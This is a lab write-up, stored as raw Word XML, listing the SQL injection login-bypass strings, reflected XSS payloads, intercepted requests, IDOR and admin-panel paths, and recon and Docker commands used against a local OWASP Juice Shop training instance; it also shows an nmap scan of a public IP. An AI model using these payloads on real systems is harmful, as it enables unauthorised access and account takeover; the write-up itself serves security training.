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053C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SOURCE CODE / COMMANDS DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCCB048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Copy into a separate DOC/TXT/PDF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169379B3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B9C07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2B07CB4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OWASP Juice Shop – Source Code, Payloads, and Commands Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACD377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Reconnaissance Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C396068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nmap -sV -sC 54.220.192.176</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034705D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curl http://127.0.0.1:3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C77FEB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187D2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E8335F0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Burp Suite Proxy Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8EA51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Firefox → Settings → Network → Manual Proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1301ECC3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 Proxy: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4A551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Port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA70246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 this proxy for all protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0EF5D9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Intercept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA4512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Burp → Proxy → Intercept → ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738A911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8518C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3BACFD0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SQL Injection Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C321DA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Login Page (successful bypass):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F66004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 OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE5FA8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Alternative SQLi variations tested:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E388094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admin@juice-sh.op'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A991B9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 OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C482585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')) OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D44BD0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'||1==1//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D4500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Intercepted request example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCF40E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/rest/user/login HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B9BE0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Host: 127.0.0.1:3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22078B3C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Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167552BE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{"email":"' OR 1=1--","password":"test"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4039D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156B0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53B678B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XSS Payloads Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFFA3D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32F6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Working Reflected XSS Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FDF96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"&gt;&lt;svg/onload=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A146C5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Triggered via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24E622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http://127.0.0.1:3000/#/search?q=%22%3E%3Csvg%2Fonload%3Dalert%28%27XSS%27%29%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D75C7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Popup confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BC1B72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Additional Payloads Attempted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0675E18C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&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A785F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&lt;img src=x onerror=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C8BD69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&lt;iframe src="javascript:alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60174A5F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B8D83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88D07A2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Access Control Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556ACBFC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32F6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Admin Panel Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D205F3B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http://127.0.0.1:3000/#/administration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF24EB9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Accessible </w:t>
      </w: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only because</w:t>
      </w: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SQL injection bypassed authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C2E573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32F6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IDOR Testing (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9493D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/rest/basket/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB888B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GET /rest/basket/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A21F1B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Modification in Burp Suite confirmed insecure direct object reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579003C8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BB7E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AEDF99B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Docker Commands Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268D8301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apt install docker.io -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE79315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systemctl start docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58025EAD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sudo docker run --rm -p 3000:3000 bkimminich/juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6E8B7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B17C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44A9477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Useful API Endpoints Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E66EF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/rest/products/search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2FA02A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/rest/user/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D202DB8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/rest/basket/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1686CA1B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/api/Feedbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04349E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2BCE4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635DD3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Captcha Examples Solved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77134BFA" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="00B32F62" w:rsidP="00B32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Examples from testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A56BE57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5 - 8 - 4 = -7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0E77F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7 * 10 * 10 = 700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654DCF72" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="00B32F62" w:rsidP="00B3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32F6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4 + 3 + 9 = 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C4039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94B72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D8B58E" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="00B32F62" w:rsidP="00B32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Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9E32D" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="00B32F62" w:rsidP="00B32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exploits performed on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B32F6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local instance</w:t>
      </w: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Juice Shop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094CFFFB" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="00B32F62" w:rsidP="00B32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production systems were tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A04F05C" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="00B32F62" w:rsidP="00B32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32F6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findings are intentionally vulnerable by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A85F1C1" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRPr="00B32F62" w:rsidRDefault="009A0947" w:rsidP="00B32F6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09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44DA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E5C511" w14:textId="77777777" w:rsidR="00B32F62" w:rsidRDefault="00B32F62"/>
    <w:sectPr w:rsidR="00B3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33886"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578C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79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62"/>
    <w:rsid w:val="008C61A3"/>
    <w:rsid w:val="009A0947"/>
    <w:rsid w:val="00B3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8469C1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8BD58F35-F9E3-EC45-8B13-1CD61D5A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2F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2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2F6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32F6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B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-regexp">
    <w:name w:val="hljs-regexp"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32F62"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00B32F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2025-11-26T21:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-26T21:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>